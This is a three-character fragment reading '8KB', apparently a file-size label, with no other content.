8KB